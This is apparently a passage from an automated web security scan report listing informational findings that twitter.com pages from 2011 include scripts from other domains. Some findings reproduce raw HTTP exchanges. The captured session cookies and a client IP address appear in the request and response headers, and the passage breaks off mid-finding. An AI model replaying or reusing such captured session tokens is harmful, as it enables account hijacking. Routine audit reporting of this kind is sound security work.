Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.502. http://twitter.com/mattbanks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/mattbanks

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225020-89730-48319
ETag: "ec0575d0afb2bf3f6fc09ae312d729c0"
Last-Modified: Fri, 28 Jan 2011 14:30:20 GMT
X-Runtime: 0.01604
Content-Type: text/html; charset=utf-8
Content-Length: 50027
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.503. http://twitter.com/mattbanks/status/28168049634844672 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/mattbanks/status/28168049634844672

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225023-49309-63525
ETag: "2ac504ed19bb0d5737b54925ddf2dbee"
Last-Modified: Fri, 28 Jan 2011 14:30:23 GMT
X-Runtime: 0.06537
Content-Type: text/html; charset=utf-8
Content-Length: 13691
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vbWF0dGJhbmtz%250AL3N0YXR1cy8yODE2ODA0OTYzNDg0NDY3MjoMY3NyZl9pZCIlMjQzOTBlZDZh%250ANWJhODhmMzZjMTQyNDJjYTViZTE2Y2M6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6%250AB2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--345453cec4138598b9a08c29980df4c39c3aba90; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.504. http://twitter.com/mattbanks/status/28168049634844672 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/mattbanks/status/28168049634844672

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:37 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225157-62292-35182
ETag: "b8970d7a65e80fb208b3104a2d57f965"
Last-Modified: Fri, 28 Jan 2011 14:32:37 GMT
X-Runtime: 0.05089
Content-Type: text/html; charset=utf-8
Content-Length: 13691
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vbWF0dGJhbmtz%250AL3N0YXR1cy8yODE2ODA0OTYzNDg0NDY3MjoMY3NyZl9pZCIlYjYxYzUwZmM2%250AOGM2MmFhYzU5YTdlMWRlMGE5ZTkwYzY6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--1daa0712bad3c6d625e4b76d8d794650b60a75f6; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.505. http://twitter.com/mennovanslooten previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/mennovanslooten

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /mennovanslooten HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:12:32 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234752-93013-22360
ETag: "f6c7786f8d85f8add292b27d40873465"
Last-Modified: Fri, 28 Jan 2011 17:12:32 GMT
X-Runtime: 0.01088
Content-Type: text/html; charset=utf-8
Content-Length: 48209
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.506. http://twitter.com/mennovanslooten previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/mennovanslooten

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /mennovanslooten HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:10 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225070-8349-1627
ETag: "d5a74d3b21022a46e5228042d143d163"
Last-Modified: Fri, 28 Jan 2011 14:31:10 GMT
X-Runtime: 0.01281
Content-Type: text/html; charset=utf-8
Content-Length: 48347
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.507. http://twitter.com/messengerpost previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/messengerpost

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /messengerpost HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225043-32375-15875
ETag: "e9683276160c0ad3462c344153ccbcdb"
Last-Modified: Fri, 28 Jan 2011 14:30:43 GMT
X-Runtime: 0.01196
Content-Type: text/html; charset=utf-8
Content-Length: 50655
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.508. http://twitter.com/messengerpost previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/messengerpost

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /messengerpost HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:34 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234694-97457-54539
ETag: "ef3094a1f07023e4a368fdd33e0084cb"
Last-Modified: Fri, 28 Jan 2011 17:11:34 GMT
X-Runtime: 0.00871
Content-Type: text/html; charset=utf-8
Content-Length: 50125
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.509. http://twitter.com/miketaylr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
